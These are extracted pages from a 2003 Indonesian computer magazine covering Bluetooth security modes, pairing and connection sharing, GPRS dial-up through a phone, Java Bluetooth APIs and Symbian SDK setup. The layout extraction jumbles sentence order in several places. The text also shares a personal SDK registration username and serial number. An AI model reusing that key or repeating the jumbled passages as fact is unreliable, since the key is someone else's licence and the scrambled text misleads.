Tab Local Services adalah service yang dapat diberikan oleh komputer kita pada piranti Bluetooth lain. Terlihat bahwa piranti lain harus mengakses PC kita lewat virtual serial port COM7 yang secara otomatis diaktifkan. Kita bisa mengaktifkan virtual serial port lain secara manual.

9

CLIENT APPLICATION
Apabila PC kita ingin memanfaatkan service yang ada pada piranti Bluetooth lain, maka PC kita akan menggunakan virtual serial port COM3 untuk mengaksesnya. Tick pada Secure Connection menunjukkan bahwa untuk terhubung diperlukan Bluetooth PIN Code.

8

NeoTek Vol. IV No. 01

NeoStart
ngurangi potensi interferensi dengan network lain yang berdekatan. maupun bergerak di dalam atau yang memasuki suatu POS (dalam hal ini 10 meter) dari seseorang yang diam ataupun bergerak. Standar 802.15.1 sedang dikembangkan dan akan eksis bersama-sama standar WLAN 802.11. Task Group 2 menelaah dan memberi rekomendasi cara memfasilitasi koeksistensi WPAN dan WLAN. 802.15.2 juga menangani urusan-urusan sehubungan dengan interferensi antara Bluetooth dan WLAN dengan cara mengembangkan suatu model untuk mengkuantifikasi inerferensi satu terhadap yang lain. Task Group 3 mendefinisikan high-rate MAC dan PHY layer yang akan memungkinkan transfer data paling sedikit 20 Mbps untuk multimedia. Task Group 4 mendefinisikan low-rate MAC dan PHY untuk piranti seperti mainan, remote control, smart tag, dan badge.

Evolusi Standar Bluetooth
Bluetooth SIG Semenjak spesifikasi Bluetooth diterbitkan pada tahun 1999, sudah lebih dari 2000 perusahaan masuk menjadi anggota asosiasi, yang dapat ikut serta dalam pengembangan standar dan ekstensi untuk masa depan melalui berbagai kelompok kerja. Spesifikasi Bluetooth 1.1 mendefinisikan gelombang radio yang beroperasi pada ISM (Industrial, Scientific, and Medical) band pada 2,4 GHz, FHSS dengan 1600 hop/detik pada 79 channel dengan kecepatan 1 Mbps. Unsur-unsur dasar suatu produk Bluetooth didefinisikan dalam dua protocol layer yang paling bawah, yaitu radio layer dan baseband layer. Pada layer-layer ini tercakup tugas-tugas seperti frequency hopping control dan clock synchronization, selain packet assembly dengan asosiasi ke FEC (Forward Error Correction) dan ARQ (Automatic Repeat Request). Link manager layer bertanggung jawab untuk mencari piranti Bluetooth lain, membentuk dan menghilangkan piconet, serta proses otentikasi dan enkripsi. Definisi-definisi layer yang lebih tinggi mencakup profilprofil Bluetooth. IEEE Konsep Bluetooth dan PAN (Personal Area Network) kini telah diterima oleh IEEE (diberi merek dagang WPAN) dalam workgroup 802.15. Walaupun demikian, IEEE 802.15 group membatasi diri hanya untuk mengembangkan standar untuk dua protocol layer bagian bawah dari OSI Reference Model. Task Group 1 (802.15 task group dibedakan dengan penomoran) bekerja pada versi IEEE dari standar Bluetooth, yang akan mendefinisikan Media Access Control (MAC) dan Physical (PHY) layer untuk piranti fixed, portabel,

Bluetooth Security
Bluetooth security apabila dibandingkan dengan WLAN security akan tampak lebih kompleks namun di lain pihak juga lebih sederhana. Lebih kompleks mengingat banyaknya opsi security yang berbeda berdasarkan skenario aplikasi yang berbeda-beda. Lebih sederhana karena pada kebanyakan bagian bersifat transparan pada pengguna. Pada WLAN peningkatan security merupakan tugas administrator network. Pada Bluetooth, karena spesifikasi Bluetooth terdapat pada setiap level, maka tingkat security yang lebih tinggi sudah built-in pada piranti-pirantinya apabila memang diperlukan. Bluetooth security mencakup otentikasi maupun kerahasiaan, dan berdasarkan algoritma enkripsi SAFER+. SAFER+ adalah suatu block cipher, namun dalam hal ini diimplementasikan sebagai suatu stream cipher. SAFER+ sudah dianalisa dan diuji secara menyeluruh sewaktu pencarian standar enkripsi nasional oleh NIST. Walaupun beberapa versi mempunyai beberapa kelemahan kecil, versi 128-bit yang digunakan dalam Bluetooth bersifat sangat kuat.

Bluetooth Security

10

PADA LAPTOP: PAIR DEVICE
Dari laptop ditemukan tiga Bluetooth device, di antaranya suatu desktop. Klik kanan pada device itu dan pilih Pair Device. Akan tampil jendela Bluetooth PIN Code Request. Masukkan Bluetooth PIN Code apa saja di sini. Harus berupa angka.

11

PADA DESKTOP
Pada desktop akan tampil pesan bahwa ada device yang mencoba connect ke desktop. Klik pada pesan itu dan jendela Bluetooth PIN Code Request yang serupa akan tampil. Masukkan Bluetooth PIN Code yang sama dengan yang dimasukkan pada laptop.

12

PADA LAPTOP
Pada laptop tampak bahwa kini Bluetooth device yang dituju (desktop) sudah Paired. Double click pada iconnya untuk melihat service apa saja yang tersedia. Kita dapat membentuk network antara laptop dengan desktop melalui fasilitas Network Access.

Vol. IV No. 01 NeoTek

9

NeoStart
Link Layer Security
Spesifikasi Bluetooth Baseband (link layer) mendefinisikan metode-metode untuk otentikasi maupun enkripsi yang berturut-turut digunakan oleh layer-layer yang lebih tinggi. Metode-metode ini memanfaatkan sejumlah key yang diciptakan oleh suatu proses yang dimulai dengan tiga entitas dasar piranti: • 48-bit device address • random number generator • secret PIN yang mungkin built-in dalam unit piranti oleh pabrikan, atau diprogram sendiri oleh pengguna. PIN mungkin hanya berupa digit 4 desimal, namun apabila diperlukan security yang lebih tinggi, dapat juga dimasukkan suatu kode PIN dengan panjang sampai 128-bit. Key pertama dari banyak key yang diciptakan oleh suatu piranti Bluetooth akan diinstal pada host dan pada dasarnya tidak lagi berubah, disebut sebagai unit key. Otentikasi Apabila suatu Bluetooth session (didefinisikan sebagai interval waktu yang pada waktu itu piranti menjadi bagian dari suatu piconet) diinisiasi, maka suatu seri key tambahan akan dibentuk. Salah satu dari berbagai key ini yang dikenal sebagai link key atau authentication key, yaitu suatu secret link key 128-bit yang hanya digunakan selama session yang bersangkutan. Proses otentikasi ini menerapkan enkripsi dari angka acak untuk setiap piranti untuk memverifikasi bahwa masing-masing menggunakan secret link key yang sama. Enkripsi Bila aplikasi memerlukan enkripsi, maka encryption key dibentuk dari link key, suatu ciphering offset number, dan suatu random number. Apabila authentication key selalu 128-bit, maka encryption key mungkin lebih pendek untuk mengakomodasi batasan restriksi enkripsi yang ditetapkan pemerintah, yang berbeda dari suatu negara ke negara lain. Suatu encryption key dibentuk setiap kali suatu piranti memasuki encryption mode, jadi berbeda dengan authentication key yang digunakan dalam keseluruhan session.

Application Layer Security
Bluetooth General Access Profile mendefinisikan tiga security mode: Mode 1 Non-secure. Otentikasi bersifat opsional Mode 2 Service-level enforced security. Service yang diberikan oleh aplikasi ini memutuskan apakah memang otentikasi atau enkripsi dibutuhkan. Bluetooth SIG telah menerbitkan white paper mengenai Bluetooth Security Architecture yang mendefinisikan suatu arsitektur yang sesuai untuk mengimplementasikan service-level enforced security pada piranti-piranti Bluetooth. White paper ini membedakan piranti-piranti kedalam dua kategori dan trust level, selain menyarankan tiga security level untuk berbagai service. Database disarankan untuk digunakan men-enable pemakai mengotorisasi piranti untuk service-service tertentu saja. Karena implementasi security pada level ini tidak mempengaruhi interoperatibilitas, white paper ini sifatnya hanya saran, dan bukan merupakan bagian dari spesifikasi Bluetooth. Mode 3 Link-level enforced security. Kedua piranti harus mengimplementasi security procedure agar dapat membentuk koneksi. Sebagai tambahan dari mode-mode di atas, suatu piranti dapat dikonfigurasi untuk tidak merespons, sehingga piranti lain tidak dapat terkoneksi padanya. Atau dapat dikonfigurasi sedemikian agar hanya piranti-piranti yang mengetahui address-nya yang dapat terhubung padanya. Begitu banyaknya dan rumitnya security level memang dibutuhkan untuk mengakomodasi beraneka macam skenario permakaian. Perancang piranti perlu memberikan opsi security yang diperlukan oleh pemakai dengan tetap menghindari pemakai dari kerumitan security level ini.

Internet Connection Sharing lewat Bluetooth

13

NETWORK ACCESS
Bluetooth device desktop menyediakan Network Access (Internet Connection Sharing di-setup sini). Double click pada service itu dan komputer laptop akan melakukan koneksi ke desktop. Pada desktop, anda harus mengizinkan koneksi ini terbentuk.

14

CONNECTED
Begitu koneksi diizinkan, maka pada laptop terlihat Connected. Pada laptop jalankan Run > winipcfg dan akan tampil jendela IP Configuration. Pilih Bluetooth PAN Driver dan amati bahwa laptop kini mempunyai IP 192.168.0.x yaitu bagian dari ICS pada desktop.

15

NETWORK NEIGHBORHOOD
Kedua komputer kini membentuk network neighborhood dan dapat share resources seperti file, printer, atau CD ROM. Juga laptop dapat terhubung ke Internet melalui komputer desktop, melakukan browsing, mengakses email, ataupun chatting. Lebih aman daripada WLAN!

10

NeoTek Vol. IV No. 01

NeoStart

MEMAHAMI BLUETOOTH
DIAL-UP INTERNET GPRS DENGAN PONSEL BLUETOOTH
Dial-up Internet ke operator GPRS telah dibahas sebelumnya dengan menggunakan port infra merah pada Sony Ericsson T610 dan komputer laptop. Sony Ericsson T610 maupun Nokia 3650 sebenarnya sudah menyediakan koneksi Bluetooth yang lebih nyaman dibandingkan menggunakan infra merah.

agaimana tidak lebih nyaman, dengan Bluetooth anda tidak usah mematut-matutkan posisi handphone agar berada dalam sudut pandang port inframerah komputer anda. Akses Internet dengan Dial-Up Networking komputer anda dapat dilakukan dengan tetap meletakkan handphone GPRS yang berfungsi sebagai modem itu tetap di saku anda. Koneksi Bluetooth juga jauh lebih stabil dibandingkan inframerah. Untuk koneksi Internet GPRS kini sudah ada opsi baru Satelindo Matrix dengan biaya langganan flat Rp25.000,- per bulan. Dapatkan informasi lebih lanjut di sini: http://www.satelindogsm.com/popup_menu /matrix-sp/matrixsp_mms.jsp

B

Akses Internet lewat Dial-Up Networking Menggunakan Bluetooth Handphone Sebagai Modem

1

PAIR DEVICE
Setelah laptop mengenali T610 sebagai suatu Bluetooth device, klik kanan pada icon T610, pilih Pair Device. Akan tampil jendela Bluetooth PIN Code Request. Masukkan Bluetooth PIN Code (sembarang angka) dan klik OK. Pada T610 masukkan PIN yang sama.

2

SERVICE DISCOVERY
Setelah paired, double click icon T610 untuk melihat service apa saja yang disediakan. Tampak ada empat service yang siap digunakan, termasuk Dial-up Networking on T610. IrMC dan OBEX (Object Exchange) adalah fasilitas untuk Bluetooth dan infra merah. Tidak kita bahas.

3

DIAL-UP PROPERTIES
Klik kanan pada Dial-up Networking on T610 dan pilih Properties. Muncul jendela Bluetooth Properties, klik Configure dan muncul jendela Bluetooth Connection. Isikan nomor dial (*99***1# bila IM3 atau *99# bila Satelindo). Connect using Bluetooth Modem. Klik Configure.

4

TCP/IP SETTING
Pada tipe dial-up server pilih PPP: Internet... Pada Advanced option Log on to network, pada Allowed network protocol TCP/IP. Klik TCP/IP setting dan pilih Server assigned IP address, Server assigned name server addresses, dan Use default gateway on remote nretwork. Klik OK.

5

CONNECT KE INTERNET
Double click pada Dial-up Networking on T610 dan koneksi akan diinisalisasi. Masukkan user name (gprs untuk IM3, wap untuk Telkomsel) dan password (im3 untuk IM3 dan wap123 untuk Telkomsel). Adapun nomor telepon sudah diisi sebelumnya.

6

CONNECT!
Anda pun terhubung ke Internet. Kecepatan yang bisa diharapkan antara 9600 bps sampai 57600 bps. Sudah memadai untuk email, chat, dan web browsing ringan. Awas! Biaya akan ditagih per Mbyte data. Satelindo Matrix sudah mendukung GPRS. Biayanya lebih ringan

Vol. IV No. 01 NeoTek

11

NeoStart

Pengantar Bluetooth untuk Java
Aplikasi Bluetooth yang pertama kali adalah pada telepon seluler, dan karena Java (J2ME) kini banyak digunakan dalam telepon seluler, maka Bluetooth untuk Java menjadi menarik untuk dipelajari. Fitrianto Halim (fitriantoh@hotmail.com) memberi pengantar hal ini untuk anda.
ika anda berkunjung ke situs www.bluetooth.org, aqnda akan menemukan lebih dari 1100 produk yang berkaitan dengan Bluetooth baik dari segi hardware maupun software, dengan produk pertama didaftarkan pada pertengahan tahun 2000. Tentunya, tidak semua produk tersebut beredar di Indonesia, karena selain harganya masih mahal, juga kalah bersaing dengan produk nirkabel lainnya (dalam hal ini wireless LAN atau Wi-Fi) serta masih belum jelasnya regulasi penggunaan frekuensi 2.4 GHz di tanah air.

M E MAHAM I B LU ETOOTH

J

global untuk komunikasi nirkabel jarak pendek yang beroperasi pada jalur 2.4 GHz. Pada bulan Desember 1999, ada empat perusahaan besar yang bergabung dalam Bluetooth SIG, yaitu: Microsoft, Lucent, 3COM dan Motorola.

Bluetooth Protocol Stack
Kunci utama spesifikasi Bluetooth adalah device dari manufaktur yang berbeda diusahakan untuk dapat saling berkomunikasi. Untuk itu, spesifikasi selain mendefinisikan sistem radio, juga mendefinisikan software stack yang memungkinkan aplikasi untuk menemukan device Bluetooth lainnya dalam suatu area, menemukan layanan Gambar 1. yang mereka tawarkan, dan Arsitektur Bluetooth protocol stack. menggunakan layanan itu.

Bluetooth dan WLAN (Wi-Fi)
Memang, kita tidak dapat membandingkan Bluetooth dengan Wi-Fi, karena Bluetooth mempunyai spesifikasi yang berbeda. Bluetooth lebih diutamakan untuk komunikasi dalam jarak pendek (short range), yaitu sekira 30 kaki atau 10 m. Namun dengan menambahkan daya (power), jangkauannya dapat diperluas hingga mencapai 100 m. Kecepatan akses Bluetooth juga hanya 1 Mb/s. Namun sejak proposal Bluetooth dimasukkan ke dalam IEEE 802.15 yang berisi standar komunikasi untuk wireless personal area network (WPAN), dimungkinkan kecepatan aksesnya dapat melebihi 20 Mb/s (standar IEEE 802.15.3). Salah satu keunggulan Bluetooth dibandingkan dengan Wi-Fi adalah selain dapat dipergunakan untuk komunikasi data, Bluetooth juga dapat dipergunakan untuk komunikasi suara (voice). Untuk menghindari interferensi, Bluetooth menggunakan suatu teknik yang dinamakan fast frequency hopping (1600 hop per detik). Spektrum frekuensinya adalah dari 2.402 GHz hingga 2.480 GHz dan dibagi menjadi 79 kanal (channel), sehingga perbedaan tiap kanal adalah 1 MHz.

Bluetooth Profile
Aplikasi dalam Bluetooth disebut juga profile. Pada Gambar 2 kita dapat melihat ketergantungan (dependency) antara profile yang satu dengan profile lainnya (Bluetooth profile dependencies).

Bluetooth Standard Komunikasi dan Komputasi
Studi tentang Bluetooth telah dimulai pada tahun 1994 oleh Ericsson Mobile Communications sebagai alternatif pengganti kabel. Penggunaan gelombang radio dipilih karena adanya beberapa keunggulan bila dibanding dengan infra-red. Nama Bluetooth sendiri diambil dari nama belakang raja B Danish, Harald Blåtand (Bluetooth). Raja Bluetooth adalah yang menyatukan rakyat Skandinavia (Denmark dan Norwegia) pada abad ke-10. Nama tersebut diadopsi karena diharapkan Bluetooth juga dapat menyatukan industri telekomunikasi dan komputasi. Pengembangan Bluetooth untuk standar industri dimulai pada Februari 1998 ketika Ericsson, IBM, Intel, Nokia, dan Toshiba mendirikan Bluetooth Special Interest Group (SIG) untuk mengembangkan dan mempromosikan sebuah solusi
12

Gambar 2. Dependensi antar-profile Bluetooth

Sebuah device Bluetooth dapat beroperasi dalam dua modus, yaitu sebagai master atau sebagai slave. Master adalah yang men-set (menginisiasi) frequency hopping sequence, sedangkan slave yang mensinkronisasi atau mengikuti master. Jaringan (network) Bluetooth disebut piconet. Dalam sebuah piconet minimal ada sebuah master dan maksimal tujuh buah slave.

NeoTek Vol. IV No. 01

NeoStart
tulisan ini dibuat (akhir September 2003), Motorola belum mengeluarkan ponsel yang mengimplementasikan JSR-82 ini. Nokia malah telah mengimplementasikan JSR-82 ini di dalam ponsel terbarunya, yaitu Nokia 6600 yang di-release pada bulan Juni 2003 (walau saat tulisan ini dibuat, ponsel Nokia 6600 belum beredar di Indonesia).

Gambar 3. Master dan slave membentuk piconet dan scatter net.

Jika hanya sebuah master dan sebuah slave dalam sebuah piconet, maka disebut koneksi point to point. Sedangkan untuk sebuah master dengan lebih dari satu slave dalam sebuah piconet, maka disebut koneksi point to multipoint. Dalam sebuah coverage area yang besar atau jumlah device Bluetooth yang banyak, sekumpulan piconet dapat saling terjalin atau dinamakan pula scatter net. Dalam hal ini, slave dalam suatu piconet dapat menjadi master bagi piconet lainnya atau sebuah slave dapat terkoneksi dengan master dari piconet lainnya.

Bluetooth untuk Java
Pada saat ini, Bluetooth untuk Java terdiri atas dua bagian, yaitu: Java Bluetooth stack dan Bluetooth API di dalam J2ME. Java Bluetooth stack merupakan suatu protokol Bluetooth sebagaimana halnya kita mengenal protokol TCP/IP. Dengan demikian, kita tidak perlu mengenal bagian "low-level"nya (native) yang biasanya dibuat dengan C++. Sayangnya, Java Bluetooth stack ini tidaklah free (terutama bagi pemakai Microsoft Windows). Cukup banyak vendor yang telah membuatnya, antara lain adalah Atinav Inc. h (http://www.atinav.com). Bagi yang ingin mencobanya, Atinav Inc. menyediakan evaluation version dengan cara mem-fax License Agreement yang dikirim melalui e-mail. J Bagi pemakai Linux, dapat mencoba BlueJ (Java Bluetooth Stack for Linux) atau dapat juga BlueZ (Official Linux O Bluetooth protocol stack) serta JBlueZ (Java API for BlueZ) J yang semuanya dapat diperoleh dari situs SourceForge.net dengan keyword bluetooth. Untuk Bluetooth API di dalam J2ME sebenarnya sudah lama dibuat spesifikasinya, yaitu JSR-82 dengan Motorola sebagai leadernya. Pada Gambar 4 anda dapat melihat arsitektur dari J2ME CDLC/MIDP dan Bluetooth API. Yang perlu diperhatikan adalah Bluetooth Gambar 4. API di dalam J2ME Arsitektur J2ME CDLC/MIDP dan tidak dapat dipergunaBluetooth API kan untuk komunikasi voice. Anehnya, saat

Gambar 5. Series 60 MIDP SDK 1.2.1 for Symbian OS.

Untuk membantu pengembangan aplikasi MIDP bagi ponsel Nokia 6600, Nokia pada pertengahan bulan Agustus 2003 mengeluarkan Series 60 MIDP SDK 1.2.1 for Symbian OS, Nokia edition yang dapat di-download di URL berikut: http://www.forum.nokia.com/files/nds_disclaimer/1,6673, 3475,00.html atau dapat diperoleh pada CD yang disertakan pada Majalah NeoTek. Perhatikan, bahwa untuk mengemulasikannya, Anda dapat mempergunakan Nokia Developer's Suite for J2ME atau J2ME Wireless Toolkit (pembahasan tentang penggunaan Nokia Developer's Suite for J2ME dan J2ME Wireless Toolkit dapat dilihat pada Majalah NeoTek Vol. III, No. 11, Ags/Sep 2003). Untuk mempercepat proses registrasi pada saat instalasi, Anda dapat mengisi sebagai berikut: • Forum Nokia Username: fitriantoh • Product Serial Number: +qkg+4Rtq5BlmftIGgX3JKCb+z0= Tentunya, yang menarik adalah adanya dokumentasi tentang Bluetooth API di dalamnya. Dan untuk membantu pemahaman tentang penggunaan Bluetooth API, telah disertakan pula contoh-contoh pemakaiannya. Hanya, entah mengapa contoh-contoh tersebut bukan berupa aplikasi MIDP, tetapi merupakan aplikasi Java. Vol. IV No. 01 NeoTek
13

NeoStart
Bluetooth untuk Sinkronisasi/File Transfer
Sebagai pelengkap dibahas Bluetooth untuk melakukan sinkronisasi dan file transfer antara komputer dengan handphone Pada Sony Ericsson T610, untuk melakukan semua itu, anda sama sekali tidak perlu menginstalasi apa-apa lagi sebab IrMC Synchronization on T610, OBEX File Transfer on T610, dan OBEX Object Push on T610 dengan double click sudah dapat dijalankan

Gambar 6. Contoh-contoh aplikasi Java Bluetooth.

Untuk menguji aplikasi yang menggunakan Bluetooth API, Nokia menyarankan menggunakan kartu Bluetooth, apakah Nokia Connectivity Card DTL-4 atau Socket Bluetooth CF Card dengan part number 8510-00159 F (keduanya hanya dapat dipasang pada laptop). Untuk informasi lengkapnya, Anda dapat membaca Setting Up and Using the Bluetooth Testing Environment for Series 60 Platform v1.3 yang dapat di-download di URL berikut: http://www.forum.nokia.com/ndsCookieBuilder?fileParam ID=3180 Kesulitan dalam pengujian aplikasi yang menggunakan Bluetooth ternyata dapat pula dijadikan suatu lahan bisnis. Rococo Software (http://rococosoft.com) sebuah perusahah an software yang berbasis di Irlandia membuat Impronto Simulator 1.1 yang fungsinya mensimulasikan pemakaian Bluetooth. Sayangnya, Impronto Simulator 1.1 ini tidaklah free dan Rococo juga tidak menyediakan trial version.

Gambar 8. Semua service pada Bluetooth device Sony Ericsson T610 dapat diakses dan dikonfigurasi dengan mudah melalui komputer

Gambar 7. Bluetooth Simulation Console

Penutup
Penulis berharap, artikel pengantar ini dapat menambah wawasan Anda tentang Bluetooth serta penggunaannya untuk Java. Referensi

• Bluetooth Technology Overview (http://www.forum.nokia.com/ndsCookieBuilder?fileParamID=2912) • Setting Up and Using the Bluetooth Testing Environment for Series 60 Platform v1.3 (http://www.forum.nokia.com/ndsCookieBuilder?fileParamID=3180) • The Java APIs for Bluetooth Wireless Technology (http://wireless.java.sun.com/midp/articles/bluetooth2) • Wireless Application Programming with J2ME and Bluetooth (http://wireless.java.sun.com/midp/articles/bluetooth1) 14

Namun pada Nokia 3650 masalahnya agak berbeda. Anda tetap harus menginstal PC Suite for Nokia 3650 untuk melakukan sinkronisasi atau file transfer via Bluetooth. Bukan cuma itu, komputer anda tidak secara otomatis mengenali virtual serial port mana yang harus dipakai. Untuk itu klik kanan pada icon Bluetooth pada taskbar dan pilih Advanced Configuration. Lalu periksa pada tab Local Service, virtual serial port berapa yang dibuka oleh Bluetooth di komputer anda (pada contoh COM7). Setelah itu klik kanan icon PC Suite 3650 pada taskbar dan pilih Properties. Akan muncul jendela Connection Properties.Tick Bluetooth connection COM7 (sesuai informasi sebelumnya) agar Nokia PC Suite 3650 mencari ke port tersebut. Double click service Bluetooth Serial Port on Nokia 3650. Akan tampil beberapa pesan kesalahan, biarkan saja dengan meng-klik OK setiap kali dan akan terlihat icon PC Suite pada taskbar akan berubah menjadi berwarna dan Nokia 3650 pun terhubung ke komputer. Sekarang jalankan PC Suite Nokia 3650 dan proses sinkronisasi, file transfer, dan lainnya dapat dilaksanakan melalui koneksi Bluetooth.

NeoTek Vol. IV No. 01

NeoTutor

Mengenal Symbian OS 7 UIQ SDK
Aplikasi Java pada ponsel selain pada MIDP yang dibuat dengan J2ME, dapat juga Personal Java yang dibuat untuk sistem operasi Symbian. Sony Ericsson P800 sudah menggunakan Symbian OS 7. Fitrianto Halim (fitriantoh@hotmail.com) membahasnya untuk anda.
kita belajar membuat aplikasi ponsel berbasis J2ME dengan J2ME Wireless Toolkit, pada edisi kali ini kita akan belajar membuat aplikasi pJava dengan Symbian OS 7 UIQ SDK yang telah dipergunakan pada ponsel Sony Ericsson P800. Pada artikel ini, kita akan belajar cara menginstalasi Symbian OS 7 UIQ SDK termasuk cara mengkonfigurasinya. Sedangkan pada artikel berikutnya, kita akan belajar membuat aplikasi pJava termasuk cara membuat file SIS (Symbian Installation).

P E RSO NAL JAVA

S

ETELAH PADA EDISI SEBELUMNYA

Kelengkapan Symbian OS 7 UIQ SDK
Sebelum Anda menginstalasi Symbian OS 7 UIQ SDK, ada baiknya anda meng-install Java Development Kit (JDK) terlebih dahulu. Hal ini karena JDK ini nantinya akan dipakai untuk meng-compile file Java. Di sini, penulis mempergunakan JDK 1.3.0 (paling baik kalau bersesuaian dengan versi JREnya, yaitu 1.3.1). Kalau kita menggunakan versi yang lebih tinggi (misalkan J2SDK 1.4.x) akan sering timbul masalah. Symbian OS 7 UIQ SDK dan update-nya bisa Anda dapatkan dari situs Ericsson Mobility World terutama dari bagian Developer Zone (http://www.ericsson.com/mobilityworld/ sub/open/index.html). Ada enam buah file untuk Symbian OS 7 UIQ SDK, yaitu: • Symbian UIQ SDK, part 1 (ZIP) • Symbian UIQ SDK, part 2 (.Z01) • Symbian UIQ SDK, part 3 (.Z02) • Symbian UIQ SDK, part 4 (.Z03) • Symbian UIQ SDK, part 5 (.Z04) • Symbian UIQ SDK, part 6 (.Z05) Sedangkan bagian update-nya hanya sebuah file saja, yaitu: UIQ SDK - UPDATE (ZIP). Update ini penting karena berisi perbaikan, terutama sangat berkaitan dengan pJava. Berikut ini adalah kutipan dari sebuah newsletter yang penulis terima berkaitan dengan update ini:
An update of the Symbian OS™ v7.0 UIQ

Gambar 1. Jalankan Setup.exe dari file uiq_sdk_r2.zip
SDK is now available. In addition to fixing several bugs and updating the documentation, it includes the ETEL (Telephony API) classes and Java-class files which were missing from the released version. The update installs on top of the existing Symbian OS UIQ SDK installation.

Karena Symbian OS 7 UIQ SDK masih belum ter-install, jalankan kembali aplikasi Setup.exe dan pilih Modify.

Berikut ini adalah tahapan-tahapan instalasi Symbian OS 7 UIQ SDK. Pertama-tama, buka file uiq_sdk_r2.zip (misalkan dengan WinZip) yang disertakan pada CD NeoTek, lalu jalankan aplikasi Setup.exe (Gambar 1). Pada bagian Select Components, beri tanda centang untuk semua komponen dan klik tombol Next. Pada tahap ini, yang di-install adalah komponen third party, meliputi JRE 1.3.1 dan Perl.

Gambar 3. Jalankan kembali Setup.exe

Pada pilihan paket (package) yang akan di-install, pilihlah semua paket.

Gambar 2. Select Components.

Gambar 4. Pilih semua paket.

Vol. IV No. 01 NeoTek

15

NeoTutor
Untuk meng-install update-nya, buka file uiqsdk_update_rc1.zip (misalkan dengan WinZip) yang disertakan pada CD NeoTek, lalu jalankan aplikasi setup.exe. Pilih agar update dilakukan pada semua bagian. Lakukan restart agar modifikasi environment variable pada file autoexec.bat dapat dijalankan. Alangkah baiknya apabila pada langkah selanjutnya anda men-set device dengan perintah berikut:
devices -setdefault @UIQ_70:com.symbian.UIQ

sebab beberapa tool ada yang baru berjalan dengan baik setelah kita men-set device.

Gambar 5. Instalasi update.

Gambar 5. Setting default device.

Cek, apakah ada penambahan PATH berikut pada file autoexec.bat: • C:\PERL\BIN • C:\Program Files\Common Files\Symbian\Tools • C:\Symbian\UIQ_70\epoc32\ release\winscw\urel Tambahkan pula environment variable berikut pada file autoexec.bat: • set epocroot=\Symbian\UIQ_70\ • set _epoc_drive_j=%epocroot%epoc32\java\ • set _epoc_drive_t=%epocroot%erj\ Mungkin Anda akan bertanya, mengapa untuk environment variable epocroot kita menghilangkan drive letter? Pertanyaan yang bagus karena di dokumentasi yang ada memang menyertakan drive letter untuk environment variable epocroot. Namun, saat penulis mencoba beberapa tool yang ada, justru kita diminta untuk menghilangkan drive letter. Karena tidak ada masalah asalkan kita berada pada drive yang sesuai, akhirnya penulis memilih untuk menghilangkan drive letter ini. Drive J dan T yang dimaksud di sini tidak ada hubungannya dengan penamaan drive di MS Windows. Drive J dan T ini nantinya akan digunakan oleh emulator untuk mencari API-API yang digunakan. Di samping itu, Anda pun disarankan untuk membuat aplikasi pJava di bawah drive T (walaupun sebenarnya tidak ada masalah kalau membuat aplikasi pJava di bawah drive J). Penggunaan drive-drive ini mengingatkan penulis sewaktu dulu menggunakan WAP emulator yang disediakan oleh Ericsson.
16

Untuk menguji apakah Symbian OS 7 UIQ SDK telah berjalan dengan baik, khususnya dapat dipergunakan aplikasi pJava, Anda dapat mencoba aplikasi Dice Machine yang ada di folder C:\Symbian\UIQ_70\erj\examples\Di ceMachine dengan menjalankan batch file Build.bat dan AppRun.bat.

Gambar 7. Emulator pjava_g (versi debug) dan pjava (versi release)

digunakan untuk meng-install dan mengemulasi aplikasi MIDP (MIDlet). Sebagai contoh, anda dapat mencoba aplikasi MyFirst yang disertakan pada CD NeoTek edisi sebelumnya. Copy folder MyFirst di bawah drive T (%epocroot%erj\) dan simpanlah file JAD dan file JAR di folder MyFirst ini. Dengan demikian, anda dapat menghapus folder-folder lainnya yang berada di bawah folder MyFirst ini.

Gambar 6. Test dengan built.bat

Batch file AppRun.bat akan menjalankan emulator versi debug pjava_g yang ada di
%epocroot%epoc32\release\winscw\udeb

Anda dapat pula menjalankan emulator versi release pjava yang ada di
%epocroot%epoc32\release\winscw\urel

dengan mengganti perintah:
%epocroot%epoc32\release\winscw\udeb\pjava_g -Dcom.symbian.appName="Dice Machine" -cd t:\examples\DiceMachine -cp .\code com.symbian.devnet.quartz.dicemachine.DiceMachine wait

dengan perintah berikut ini:
%epocroot%epoc32\release\winscw\urel\pjava -Dcom.symbian.appName="Dice Machine" -cd t:\examples\DiceMachine -cp .\code com.symbian.devnet.quartz.dicemachine.DiceMachine wait

Yang menarik adalah emulator dari Symbian OS 7 UIQ SDK juga dapat

Gambar 8. Copy folder MyFirst di bawah drive T

NeoTek Vol. IV No. 01

NeoTutor
Gambar 9. Instalasi melalui menu Launcher > Install

Dari menu Launcher > Install, kini kita dapat meng-instal aplikasi MyFirst. Hasil dari proses instalasi ini adalah aplikasi MyFirst bersama aplikasi lainnya, dengan ikon

yang digunakan adalah ikon standar. Klik aplikasi MyFirst dan kini Anda dapat menikmati hasilnya. Pada artikel selanjutnya, penulis akan membahas cara membuat aplikasi pJava termasuk cara membuat file SIS (Symbian Installation).

MEMASANG SKIN SONY ERICSSON P800 PADA EMULATOR SYMBIAN OS 7 UIQ SDK
Bosan dengan tampilan standar emulator UIQ SDK Symbian OS 7 UIQ SDK? Mari kita memasang skin Sony Ericsson P800 pada emulatornya.
ntuk mendapatkan skin Sony Ericsson P800, download pada URL berikut: http://www.ericsson.com/ mobilityworld/developerszonedown/downloads/ tools/epoc/symbian_p800_emulator.zip atau bisa pula didapatkan pada CD NeoTek. Pemakaiannya cukup mudah.

U

Pertama-tama, buka file symbian_p800_emulator.zip (misalkan dengan WinZip), lalu select file epoc.bmp dan epoc.ini. Ekstraklah file-file tersebut ke folder \Symbian\UIQ_70\epoc32\data. Ada baiknya Anda mem-back up file epoc.bmp dan epoc.ini sebelum ditimpa dengan yang baru. Dengan demikian, saat Anda membutuhkan tampilan emulator yang lama, Anda dapat menggunakannya kembali. Kini, tampilan emulator telah berubah seperti tampilan ponsel Sony Ericsson P800.

Vol. IV No. 01 NeoTek

17

NeoTutor

Membuat Sendiri Aplikasi pJava
Anda dapat membuat sendiri aplikasi pJava untuk handphone Sony Ericsson P800 dan untuk mengujinya menggunakan emulator. Fitrianto Halim (fitriantoh@hotmail.com) membahas lengkap sampai pembentukan file SIS (Symbian Installation)
p PersonalJava (pJava) yang telah dibahas ebelumnya dengan UIQ SDK Symbian OS 7 (telah digunakan pada ponsel Sony Ericsson P800), penulis membuatkan sebuah aplikasi Symbian sederhana, yaitu TicTacToe.

P E RSO NAL JAVA

S

EBAGAI KELANJUTAN ARTIKEL PENGENALAN TERHADAP

Adapun proses pembuatan aplikasi Symbian bisa dilihat pada Gambar 1. Hanya, dalam prakteknya beberapa bagian dapat disederhanakan

Meng-compile Source Code .Java
